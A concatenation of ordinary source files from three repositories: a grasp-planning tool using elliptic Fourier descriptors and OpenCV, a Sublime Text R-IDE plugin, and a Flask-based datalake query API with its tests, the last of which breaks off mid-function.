def plot_efd(P, N, Cbar, image=None, contour=None, n=300):
"""Plot a ``[2 x (N / 2)]`` grid of successive truncations of the series.
.. note::
Requires `matplotlib <http://matplotlib.org/>`_!
:param numpy.ndarray coeffs: ``[N x 4]`` Fourier coefficient array.
:param list, tuple or numpy.ndarray locus:
The :math:`A_0` and :math:`C_0` elliptic locus in [#a]_ and [#b]_.
:param int n: Number of points to use for plotting of Fourier series.
"""
try:
import matplotlib.pyplot as plt
except ImportError:
print("Cannot plot: matplotlib was not installed.")
return
# print(contour[:,1],contour[:,0])
# for ii in range(1, len(xt)):
# plt.plot(xt[ii], yt[ii], 'r*', linewidth=2)
# plt.show()
# plt.set_title(str(n + 1))
# if contour is not None:
# plt.plot(contour[:, 0], contour[:, 1], 'c--', linewidth=2)
plt.plot(P[:, 0], P[:, 1], 'r', linewidth=2)
if image is not None:
plt.imshow(image, plt.cm.gray)
# plt.show()
for ii in range(1, n):
if Cbar[ii] > 0:
plt.plot(P[ii, 0], P[ii, 1], 'y*', linewidth=2)
plt.show()
def finalPlot(P, finalX, finalY, image=None, contour=None, n=300):
"""Plot a ``[2 x (N / 2)]`` grid of successive truncations of the series.
.. note::
Requires `matplotlib <http://matplotlib.org/>`_!
:param numpy.ndarray coeffs: ``[N x 4]`` Fourier coefficient array.
:param list, tuple or numpy.ndarray locus:
The :math:`A_0` and :math:`C_0` elliptic locus in [#a]_ and [#b]_.
:param int n: Number of points to use for plotting of Fourier series.
"""
try:
import matplotlib.pyplot as plt
except ImportError:
print("Cannot plot: matplotlib was not installed.")
return
# print(contour[:,1],contour[:,0])
# for ii in range(1, len(xt)):
# plt.plot(xt[ii], yt[ii], 'r*', linewidth=2)
# plt.show()
# plt.set_title(str(n + 1))
# if contour is not None:
# plt.plot(contour[:, 0], contour[:, 1], 'c--', linewidth=2)
plt.plot(P[:, 0], P[:, 1], 'y', linewidth=2)
if image is not None:
plt.imshow(image, plt.cm.gray)
# plt.show()
plt.plot(P[finalX, 0], P[finalX, 1], 'r+', linewidth=2)
plt.plot(P[finalY, 0], P[finalY, 1], 'r+', linewidth=2)
plt.show()
```
#### File: jpchiodini/Grasp-Planning/test_pp.py
```python
import numpy as np
from matplotlib import pyplot as plt
import pyefd
import Grasping
import cv2 as cv
import rospy
from std_msgs.msg import String
def find_current_grasp():
# find the contour of the image.
# img = cv.imread('test5.png', 0)
img = cv.imread('test5.png',0)
img = 255-img
kernel = np.ones((15, 15), np.uint8)
img = cv.dilate(img, kernel, 1)
img = cv.erode(img, kernel, 1)
t = 180
# create binary image
# gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
blur = cv.GaussianBlur(img, (5, 5), 0)
(t, binary) = cv.threshold(blur, t, 255, cv.THRESH_BINARY)
cv.imshow("output",binary)
# find contours
(_, contours, _) = cv.findContours(binary, cv.RETR_EXTERNAL,
cv.CHAIN_APPROX_NONE)
# print table of contours and sizes
print("Found %d objects." % len(contours))
for (i, c) in enumerate(contours):
print("\tSize of contour %d: %d" % (i, len(c)))
# draw contours over original image
cv.drawContours(img, contours, -1, (0, 0, 255), 5)
# display original image with contours
cv.namedWindow("output", cv.WINDOW_NORMAL)
cv.imshow("output", img)
cv.waitKey(0)
edge = cv.Canny(img, 100, 200)
_, cnts, _ = cv.findContours(edge.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)
cv.imshow('g',edge)
cv.waitKey(0)
cnts = sorted(cnts, key=cv.contourArea, reverse=True)[:1]
screenCnt = None
contour_1 = np.vstack(cnts[0]).squeeze()
plt.imshow(img, plt.cm.gray)
plt.plot(contour_1[:, 0], contour_1[:, 1])
plt.show()
# plots clockwise
# for ii in range(1, len(contour_1)):
# plt.plot(contour_1[ii,0], contour_1[ii,1], 'y*', linewidth=2)
# plt.show()
numPts = 200
order = 4
# pre-calculate symbolic variables so we can solve numerically in the loop.
px, py, zx, zy, nx, ny = pyefd.initEFDModel(order)
# this part runs in the loop:
# 1) calculate the EFD silhouette:
locus = pyefd.calculate_dc_coefficients(contour_1)
coeffs = pyefd.elliptic_fourier_descriptors(contour_1, order)
# 2) Build the grasping point model from silhouette data, and compute best grasp.
P, N, Cbar = pyefd.generateEFDModel(coeffs, locus, numPts, px, py, zx, zy, nx, ny)
pyefd.plot_efd(P, N, Cbar, img, contour_1, numPts)
xLoc, yLoc = Grasping.GraspPointFiltering(numPts, P, N, Cbar)
pyefd.finalPlot(P, xLoc, yLoc, img, contour_1, numPts)
return xLoc, yLoc
if __name__ == '__main__':
find_current_grasp()
```
#### File: jpchiodini/Grasp-Planning/tests.py
```python
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import numpy as np
import pyefd
lbl_1 = 5
img_1 = np.array(
[[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 191, 64, 127, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0, 0, 127, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 64, 0, 0, 0, 0, 64, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 191, 0, 0, 0, 0, 0, 0, 0, 64, 127, 64, 64, 0, 0, 64, 191, 255, 255, 255,
255],
[255, 255, 255, 255, 255, 255, 255, 191, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 127, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 64, 0, 0, 127, 255, 255, 191, 64, 0, 0, 0, 0, 0, 64, 127, 127, 255, 255, 255,
255, 255],
[255, 255, 255, 255, 255, 255, 191, 0, 0, 0, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 191, 0, 0, 0, 64, 127, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 64, 0, 0, 0, 0, 0, 64, 191, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 64, 0, 0, 0, 0, 64, 191, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 191, 127, 0, 0, 0, 0, 127, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 191, 127, 0, 0, 0, 64, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0, 0, 191, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 0, 127, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 0, 127, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 191, 255, 255, 255, 255, 127, 0, 0, 0, 191, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 127, 255, 255, 191, 64, 0, 0, 0, 191, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 191, 255, 255, 255, 255, 255, 255, 255,
255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 0, 0, 0, 0, 0, 64, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 0, 0, 64, 191, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255]])
contour_1 = np.array([[24.0, 13.0125], [23.0125, 14.0], [23.004188481675392, 15.0], [23.0, 15.0125], [22.0125, 16.0],
[22.00313725490196, 17.0], [22.0, 17.004188481675392], [21.0, 17.004188481675392],
[20.004188481675392, 18.0], [20.0, 18.004188481675392], [19.0, 18.006299212598424],
[18.0, 18.006299212598424], [17.0, 18.004188481675392], [16.9875, 18.0], [16.0, 17.0125],
[15.993700787401576, 17.0], [15.0, 16.006299212598424], [14.995811518324608, 16.0],
[14.9875, 15.0], [14.0, 14.0125], [13.995811518324608, 14.0], [13.9875, 13.0], [13.0, 12.0125],
[12.996862745098039, 12.0], [12.993700787401576, 11.0], [12.9875, 10.0], [12.0, 9.0125],
[11.0, 9.003137254901961], [10.0, 9.006299212598424], [9.006299212598424, 10.0],
[9.003137254901961, 11.0], [9.003137254901961, 12.0], [9.004188481675392, 13.0], [9.0125, 14.0],
[10.0, 14.9875], [10.003137254901961, 15.0], [10.003137254901961, 16.0],
[10.003137254901961, 17.0], [10.003137254901961, 18.0], [10.003137254901961, 19.0],
[10.0, 19.0125], [9.0125, 20.0], [9.006299212598424, 21.0], [9.006299212598424, 22.0],
[9.0, 22.006299212598424], [8.9875, 22.0], [8.0, 21.0125], [7.996862745098039, 21.0],
[7.996862745098039, 20.0], [8.0, 19.9875], [8.9875, 19.0], [8.9875, 18.0],
[8.993700787401576, 17.0], [8.9875, 16.0], [8.0, 15.0125], [7.996862745098039, 15.0],
[7.9875, 14.0], [7.0, 13.0125], [6.993700787401575, 13.0], [6.0, 12.006299212598424],
[5.993700787401575, 12.0], [5.9875, 11.0], [5.995811518324607, 10.0], [6.0, 9.996862745098039],
[7.0, 9.9875], [7.9875, 9.0], [8.0, 8.995811518324608], [8.995811518324608, 8.0],
[9.0, 7.995811518324607], [10.0, 7.9875], [10.9875, 7.0], [11.0, 6.995811518324607],
[12.0, 6.995811518324607], [12.0125, 7.0], [13.0, 7.9875], [13.003137254901961, 8.0],
[13.006299212598424, 9.0], [13.0125, 10.0], [14.0, 10.9875], [14.004188481675392, 11.0],
[14.006299212598424, 12.0], [15.0, 12.993700787401576], [15.004188481675392, 13.0],
[15.006299212598424, 14.0], [16.0, 14.993700787401576], [16.00313725490196, 15.0],
[17.0, 15.996862745098039], [17.006299212598424, 16.0], [18.0, 16.993700787401576],
[19.0, 16.993700787401576], [19.993700787401576, 16.0], [20.0, 15.993700787401576],
[20.993700787401576, 15.0], [21.0, 14.9875], [21.9875, 14.0], [21.995811518324608, 13.0],
[21.99686274509804, 12.0], [21.99686274509804, 11.0], [21.993700787401576, 10.0],
[21.0, 9.006299212598424], [20.993700787401576, 9.0], [21.0, 8.993700787401576],
[22.0, 8.996862745098039], [22.006299212598424, 9.0], [23.0, 9.993700787401576],
[23.006299212598424, 10.0], [24.0, 10.993700787401576], [24.00313725490196, 11.0],
[24.00313725490196, 12.0], [24.00313725490196, 13.0], [24.0, 13.0125]])
def test_efd_shape_1():
coeffs = pyefd.elliptic_fourier_descriptors(contour_1, order=10)
assert coeffs.shape == (10, 4)
def test_efd_shape_2():
c = pyefd.elliptic_fourier_descriptors(contour_1, order=40)
assert c.shape == (40, 4)
def test_normalizing_1():
c = pyefd.elliptic_fourier_descriptors(contour_1, normalize=False)
assert np.abs(c[0, 0]) > 0.0
assert np.abs(c[0, 1]) > 0.0
assert np.abs(c[0, 2]) > 0.0
def test_normalizing_2():
c = pyefd.elliptic_fourier_descriptors(contour_1, normalize=True)
np.testing.assert_almost_equal(c[0, 0], 1.0, decimal=14)
np.testing.assert_almost_equal(c[0, 1], 0.0, decimal=14)
np.testing.assert_almost_equal(c[0, 2], 0.0, decimal=14)
def test_locus():
locus = pyefd.calculate_dc_coefficients(contour_1)
np.testing.assert_array_almost_equal(locus, np.mean(contour_1, axis=0), decimal=0)
def test_fit_1():
n = 300
locus = pyefd.calculate_dc_coefficients(contour_1)
coeffs = pyefd.elliptic_fourier_descriptors(contour_1, order=20)
t = np.linspace(0, 1.0, n)
xt = np.ones((n,)) * locus[0]
yt = np.ones((n,)) * locus[1]
for n in pyefd._range(coeffs.shape[0]):
xt += (coeffs[n, 0] * np.cos(2 * (n + 1) * np.pi * t)) + \
(coeffs[n, 1] * np.sin(2 * (n + 1) * np.pi * t))
yt += (coeffs[n, 2] * np.cos(2 * (n + 1) * np.pi * t)) + \
(coeffs[n, 3] * np.sin(2 * (n + 1) * np.pi * t))
assert True
``` |
{
"source": "jpcirrus/sublime-ide-r",
"score": 2
} |
#### File: ride/buildsys/build.py
```python
import sublime
import sublime_plugin
import copy
import json
import os
import threading
from ..settings import ride_settings
from ..utils import selector_is_active
ride_menu = [
{
"caption": "R-IDE",
"id": "R-IDE",
"children": [
{
"caption": "Extract Function",
"command": "ride_extract_function"
},
{
"caption": "-"
},
{
"caption": "Exec",
"command": "ride_exec"
},
{
"caption": "-"
},
]
}
]
ride_build = {
"keyfiles": ["DESCRIPTION"],
"selector": "source.r, text.tex.latex.rsweave, text.html.markdown.rmarkdown, source.c++.rcpp",
"target": "ride_exec",
"cancel": {"kill": True},
"variants": []
}
def generate_menu(path):
menu = copy.deepcopy(ride_menu)
menu_items = ride_settings.get("menu_items", [])
if menu_items:
menu[0]["children"].insert(2, {"caption": "-"})
for item in reversed(menu_items):
menu[0]["children"].insert(2, item)
exec_items = ride_settings.get("exec_items", [])
for item in exec_items:
caption = item["caption"] if "caption" in item else item["name"]
if "cmd" in item:
args = {
"cmd": item["cmd"],
"selector": item["selector"] if "selector" in item else ""
}
if "file_regex" in item:
args["file_regex"] = item["file_regex"]
if "working_dir" in item:
args["working_dir"] = item["working_dir"]
if "subdir" in item:
args["subdir"] = item["subdir"]
menu[0]["children"].append({
"caption": caption,
"command": "ride_exec",
"args": args
})
else:
menu[0]["children"].append({"caption": caption})
pathdir = os.path.dirname(path)
if not os.path.exists(pathdir):
os.makedirs(pathdir, 0o755)
with open(path, 'w') as json_file:
json.dump(menu, json_file)
def generate_build(path, view):
build = copy.deepcopy(ride_build)
items = ride_settings.get("exec_items", [])
for item in items:
caption = item["caption"] if "caption" in item else item["name"]
if caption == "-":
continue
if "selector" in item and not selector_is_active(item["selector"], view=view):
continue
v = {
"name": caption,
"cmd": item["cmd"]
}
if "file_regex" in item:
v["file_regex"] = item["file_regex"]
if "working_dir" in item:
v["working_dir"] = item["working_dir"]
if "subdir" in item:
v["subdir"] = item["subdir"]
build["variants"].append(v)
pathdir = os.path.dirname(path)
if not os.path.exists(pathdir):
os.makedirs(pathdir, 0o755)
with open(path, 'w') as json_file:
json.dump(build, json_file)
def plugin_unloaded():
menu_path = os.path.join(
sublime.packages_path(), 'User', 'R-IDE', 'Main.sublime-menu')
if os.path.exists(menu_path):
os.unlink(menu_path)
build_path = os.path.join(
sublime.packages_path(), 'User', 'R-IDE', 'R-IDE.sublime-build')
if os.path.exists(build_path):
os.unlink(build_path)
class RideDynamicMenuListener(sublime_plugin.EventListener):
def on_activated_async(self, view):
if view.settings().get('is_widget'):
return
if hasattr(self, "timer") and self.timer:
self.timer.cancel()
if not ride_settings.get("r_ide_menu", False):
return
def set_main_menu():
menu_path = os.path.join(
sublime.packages_path(), 'User', 'R-IDE', 'Main.sublime-menu')
if selector_is_active(view=view):
if not os.path.exists(menu_path):
generate_menu(menu_path)
else:
if os.path.exists(menu_path):
os.remove(menu_path)
self.timer = threading.Timer(0.5, set_main_menu)
self.timer.start()
class RideDynamicBuildListener(sublime_plugin.EventListener):
def on_activated_async(self, view):
if view.settings().get('is_widget'):
return
if not selector_is_active(view=view):
return
if hasattr(self, "timer") and self.timer:
self.timer.cancel()
def set_build():
build_path = os.path.join(
sublime.packages_path(), 'User', 'R-IDE', 'R-IDE.sublime-build')
generate_build(build_path, view=view)
self.timer = threading.Timer(0.5, set_build)
self.timer.start()
```
#### File: ride/commands/extract_function.py
```python
import sublime
import sublime_plugin
import tempfile
import re
import os
from ..r import R
from ..utils import selector_is_active
class RideExtractFunctionCommand(sublime_plugin.TextCommand):
def run(self, edit, func_name=None):
if not func_name:
self.view.window().show_input_panel(
"Function name:", "",
lambda x: self.view.run_command("ride_extract_function", {"func_name": x}),
None, None)
return
sels = self.view.sel()
if len(sels) == 0 or len(sels) > 1:
return
region = self.view.sel()[0]
indentation = re.match(
r"^\s*", self.view.substr(self.view.line(region.begin()))).group(0)
if region.empty():
code = self.view.substr(self.view.line(region.begin()))
else:
code = self.view.substr(
sublime.Region(
self.view.line(region.begin()).begin(),
self.view.line(region.end()).end()))
try:
free_vars = self.detect_free_vars(code)
self.view.insert(edit,
self.view.line(region.end()).end(),
"\n{}}}\n".format(indentation))
self.view.insert(edit,
self.view.line(region.begin()).begin(),
"{}{} <- function({}) {{\n".format(
indentation, func_name, ", ".join(free_vars)))
self.view.run_command("indent")
sublime.status_message("Extract function successed.")
except Exception as e:
print(e)
sublime.status_message("Extract function failed.")
def detect_free_vars(self, code):
dfv_path = tempfile.mkstemp(suffix=".R")[1]
data = sublime.load_resource("Packages/R-IDE/ride/commands/detect_free_vars.R")
with open(dfv_path, 'w') as f:
f.write(data.replace("\r\n", "\n"))
f.close()
result = R(
file=dfv_path,
stdin_text=code
).strip()
try:
os.unlink(dfv_path)
except Exception:
pass
return [s.strip() for s in result.split("\n")] if result else []
def is_enabled(self, **kwargs):
view = self.view
if not selector_is_active("source.r", view=view):
return False
if all(s.empty() for s in view.sel()):
return False
return True
```
#### File: sublime-ide-r/ride/lsp.py
```python
import sublime
from .settings import ride_settings
from .utils import selector_is_active
UNLOAD_MESSAGE = """
R-IDE: LSP is not installed. Please install it via Package Control.
"""
try:
import LSP # noqa
LSP_FOUND = True
except Exception:
print(UNLOAD_MESSAGE)
LSP_FOUND = False
if LSP_FOUND and sublime.version() > "4000":
from LSP.plugin.core.sessions import AbstractPlugin
class LspRLangPlugin(AbstractPlugin):
@classmethod
def name(cls):
return "rlang"
@classmethod
def configuration(cls):
basename = "LSP-rlang.sublime-settings"
filepath = "Packages/R-IDE/{}".format(basename)
return sublime.load_settings(basename), filepath
@classmethod
def additional_variables(cls):
r_binary_lsp = ride_settings.get("r_binary_lsp", None)
if not r_binary_lsp:
r_binary_lsp = ride_settings.r_binary()
return {"r_binary_lsp": r_binary_lsp}
def plugin_loaded():
pass
elif LSP_FOUND:
from LSP.plugin.core.handlers import LanguageHandler
from LSP.plugin.core.settings import ClientConfig
class LspRLangPlugin(LanguageHandler):
@property
def name(self):
return "rlang"
def __init__(self):
path = ride_settings.get("r_binary_lsp", None)
if not path:
path = ride_settings.r_binary()
self._config = ClientConfig(
name=self.name,
binary_args=[
path,
"--slave",
"-e",
"languageserver::run()"
],
tcp_port=None,
scopes=["source.r", "text.html.markdown.rmarkdown"],
syntaxes=[
"Packages/R/R.sublime-syntax",
"Packages/R-IDE/R Markdown.sublime-syntax"
],
languageId='r',
languages=[],
enabled=False,
init_options=dict(),
settings={
"diagnostics": ride_settings.get("diagnostics", True),
"debug": ride_settings.get("lsp_debug", False)
},
env=ride_settings.ride_env()
)
@property
def config(self):
return self._config
def on_start(self, window):
return selector_is_active(window=window)
def plugin_loaded():
pass
else:
class LspRLangPlugin():
pass
def plugin_loaded():
sublime.message_dialog(UNLOAD_MESSAGE)
```
#### File: sublime-ide-r/ride/r.py
```python
import sublime
import re
import subprocess
from .utils import find_working_dir
from .settings import ride_settings
ANSI_ESCAPE = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -/]*[@-~]')
message_shown = [False]
def R(script=None, file=None, args=None, stdin_text=None,
slave=True, quiet=True, working_dir=None):
cmd = [ride_settings.r_binary()]
if slave:
cmd = cmd + ["--slave"]
elif quiet:
cmd = cmd + ["--quiet"]
if script:
cmd = cmd + ["-e", script]
elif file:
cmd = cmd + ["-f", file]
if args:
cmd = cmd + args
if sublime.platform() == "windows":
# make sure console does not come up
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
if not working_dir:
working_dir = find_working_dir()
ride_env = ride_settings.ride_env()
try:
p = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=working_dir,
env=ride_env,
startupinfo=startupinfo,
universal_newlines=True)
stdout, stderr = p.communicate(input=stdin_text)
if p.returncode == 0:
return ANSI_ESCAPE.sub('', stdout)
else:
raise Exception(
"Failed to execute RScript with the following output:\n\n{}".format(stderr))
except FileNotFoundError:
if not message_shown[0]:
sublime.message_dialog(
"R binary cannot be found automatically. "
"The path to `R` can be specified in the R-IDE settings.")
message_shown[0] = True
raise Exception("R binary not found.")
``` |
{
"source": "jpclark6/datalake",
"score": 2
} |
#### File: api/datalake_api/app.py
```python
import logging
from flask import Flask, jsonify, redirect
from flask_swagger import swagger
import os
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
from datalake_api.v0 import v0
from datalake_api import settings
LOGGER = logging.getLogger(__name__)
app = Flask(__name__)
app.config.from_object(settings)
if 'DATALAKE_API_CONFIG' in os.environ:
app.config.from_envvar('DATALAKE_API_CONFIG')
app.register_blueprint(v0)
level = app.config.get('DATALAKE_API_LOG_LEVEL')
if level is not None and not app.debug:
logging.basicConfig(level=level)
logging.getLogger('boto3.resources.action').setLevel(logging.WARN)
sentry_sdk.init(integrations=[FlaskIntegration()])
@app.route('/')
def index():
return redirect("/docs/", code=302)
@app.route("/docs/")
def docs():
return redirect("/static/index.html", code=302)
@app.route("/spec/")
def spec():
swag = swagger(app)
swag['info']['version'] = "0"
swag['info']['title'] = "Datalake API"
swag['info']['description'] = 'Query files in the datalake archive'
return jsonify(swag)
@app.route('/health/')
def health():
return jsonify({})
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
```
#### File: datalake/api/setup.py
```python
from setuptools import setup
from setuptools import distutils
import os
import sys
def get_version_from_pkg_info():
metadata = distutils.dist.DistributionMetadata("PKG-INFO")
return metadata.version
def get_version_from_pyver():
try:
import pyver
except ImportError:
if 'sdist' in sys.argv or 'bdist_wheel' in sys.argv:
raise ImportError('You must install pyver to create a package')
else:
return 'noversion'
version, version_info = pyver.get_version(pkg="datalake_api",
public=True)
return version
def get_version():
if os.path.exists("PKG-INFO"):
return get_version_from_pkg_info()
else:
return get_version_from_pyver()
setup(name='datalake_api',
url='https://github.com/planetlabs/datalake-api',
version=get_version(),
description='datalake_api ingests datalake metadata records',
author='<NAME>',
author_email='<EMAIL>',
packages=['datalake_api'],
install_requires=[
'pyver>=1.0.18',
'memoized_property>=1.0.2',
'simplejson>=3.3.1',
'Flask>=0.10.1',
'flask-swagger==0.2.8',
'boto3==1.1.3',
'sentry-sdk[flask]>=0.19.5',
'blinker>=1.4',
],
extras_require={
'test': [
'pytest==2.7.2',
'flake8==2.5.0',
'moto==0.4.23',
],
},
include_package_data=True)
```
#### File: api/tests/test_archive_querier.py
```python
import pytest
from datalake.common import DatalakeRecord
from datalake.tests import random_metadata
import simplejson as json
from urlparse import urlparse
import time
from datalake_api.querier import ArchiveQuerier, MAX_RESULTS
from conftest import client, YEAR_2010
_ONE_DAY_MS = 24 * 60 * 60 * 1000
# we run all of the tests in this file against both the ArchiveQuerier and the
# HTTP API. To achieve the latter, we wrap up the flask test client in an
# object that looks like an ArchiveQuerier and returns HttpResults.
class HttpResults(list):
def __init__(self, result):
assert result.status_code == 200
self.response = json.loads(result.get_data())
self._validate_response()
records = [HttpRecord(**r) for r in self.response['records']]
super(HttpResults, self).__init__(records)
def _validate_response(self):
for k in ['next', 'records']:
assert k in self.response
self._validate_next_url(self.response['next'])
def _validate_next_url(self, next):
if next is None:
return
parts = urlparse(next)
assert 'cursor=' in parts.query
@property
def cursor(self):
return self.response['next']
class HttpRecord(dict):
def __init__(self, **kwargs):
super(HttpRecord, self).__init__(**kwargs)
self._validate()
def _validate(self):
assert 'http_url' in self
assert self['http_url'].startswith('http')
assert self['http_url'].endswith(self['metadata']['id'] + '/data')
class HttpQuerier(object):
def __init__(self, *args, **kwargs):
self.client = client()
def query_by_work_id(self, work_id, what, where=None, cursor=None):
params = dict(
work_id=work_id,
what=what,
where=where,
)
return self._query_or_next(params, cursor)
def query_by_time(self, start, end, what, where=None, cursor=None):
params = dict(
start=start,
end=end,
what=what,
where=where,
)
return self._query_or_next(params, cursor)
def _query_or_next(self, params, cursor):
if cursor is None:
result = self._do_query(params)
else:
result = self._get_next(cursor)
return HttpResults(result)
def _do_query(self, params):
uri = '/v0/archive/files/'
params = ['{}={}'.format(k, v) for k, v in params.iteritems()
if v is not None]
q = '&'.join(params)
if q:
uri += '?' + q
return self.client.get(uri)
def _get_next(self, cursor):
# the "cursor" is the next URL in this case
# Work around this issue with the flask test client:
# https://github.com/mitsuhiko/flask/issues/968
cursor = '/'.join([''] + cursor.split('/')[3:])
return self.client.get(cursor)
def query_latest(self, what, where):
uri = '/v0/archive/latest/{}/{}'.format(what, where)
result = self.client.get(uri)
if result.status_code == 404:
return None
assert result.status_code == 200
record = json.loads(result.get_data())
return HttpRecord(**record)
@pytest.fixture(params=[ArchiveQuerier, HttpQuerier],
ids=['archive_querier', 'http'])
def querier(request, dynamodb):
return request.param('test', dynamodb=dynamodb)
def in_url(result, part):
url = result['url']
parts = url.split('/')
return part in parts
def in_metadata(result, **kwargs):
m = result['metadata']
return all([k in m and m[k] == kwargs[k] for k in kwargs.keys()])
def all_results(results, **kwargs):
assert len(results) >= 1
return all([in_metadata(r, **kwargs) for r in results])
def result_between(result, start, end):
assert start < end
assert result['metadata']['start'] < result['metadata']['end']
if result['metadata']['end'] < start:
return False
if result['metadata']['start'] > end:
return False
return True
def all_results_between(results, start, end):
assert len(results) >= 1
return all([result_between(r, start, end) for r in results])
def test_query_by_work_id(table_maker, querier, record_maker):
records = []
for i in range(2):
work_id = 'work{}'.format(i)
records += record_maker(work_id=work_id, what='foo')
table_maker(records)
results = querier.query_by_work_id('work0', 'foo')
assert len(results) == 1
assert all_results(results, work_id='work0')
def test_query_work_id_with_where(table_maker, querier, record_maker):
records = []
for i in range(4):
work_id = 'work0'
where = 'worker{}'.format(i)
records += record_maker(work_id=work_id, what='foo', where=where)
table_maker(records)
results = querier.query_by_work_id('work0', 'foo', where='worker0')
assert len(results) == 1
assert all_results(results, work_id='work0', where='worker0')
def test_query_by_time(table_maker, querier, record_maker):
records = []
for start in range(YEAR_2010, YEAR_2010+100, 10):
end = start + 9
records += record_maker(start=start, end=end, what='foo')
table_maker(records)
results = querier.query_by_time(YEAR_2010, YEAR_2010+9, 'foo')
assert len(results) == 1
assert all_results_between(results, YEAR_2010, YEAR_2010+9)
def test_query_by_time_with_where(table_maker, querier, record_maker):
records = []
for i in range(4):
where = 'worker{}'.format(i)
records += record_maker(start=YEAR_2010, end=YEAR_2010+10,
what='foo', where=where)
table_maker(records)
results = querier.query_by_time(YEAR_2010, YEAR_2010+10, 'foo',
where='worker2')
assert len(results) == 1
assert all_results(results, start=YEAR_2010, end=YEAR_2010+10,
where='worker2')
assert all_results_between(results, YEAR_2010, YEAR_2010+10)
def test_deduplicating_time_records(table_maker, querier, record_maker):
# Create a record that definitively spans two time buckets, and make sure
# that we only get one record back when we query for it.
start = YEAR_2010
two_buckets = 2 * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
end = YEAR_2010 + two_buckets
records = record_maker(start=start, end=end, what='foo')
table_maker(records)
results = querier.query_by_time(start, end+two_buckets, 'foo')
assert len(results) == 1
def test_deduplicating_work_id_records(table_maker, querier, record_maker):
start = YEAR_2010
end = YEAR_2010 + 2 * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
records = record_maker(start=start, end=end, what='foo', work_id='job0')
table_maker(records)
results = querier.query_by_work_id('job0', 'foo')
assert len(results) == 1
def get_multiple_pages(query_function, query_args):
results = []
cursor = None
while True:
page = get_page(query_function, query_args, cursor)
# Ensure the first page has a cursor
if len(results) == 0:
assert page.cursor is not None
results += page
cursor = page.cursor
if cursor is None:
break
return results
def get_all_pages(query_function, query_args):
pages = []
cursor = None
while True:
page = get_page(query_function, query_args, cursor)
pages.append(page)
cursor = page.cursor
if cursor is None:
break
return pages
def get_page(query_function, query_args, cursor=None):
page = query_function(*query_args, cursor=cursor)
page_len = len(page)
assert page_len <= MAX_RESULTS
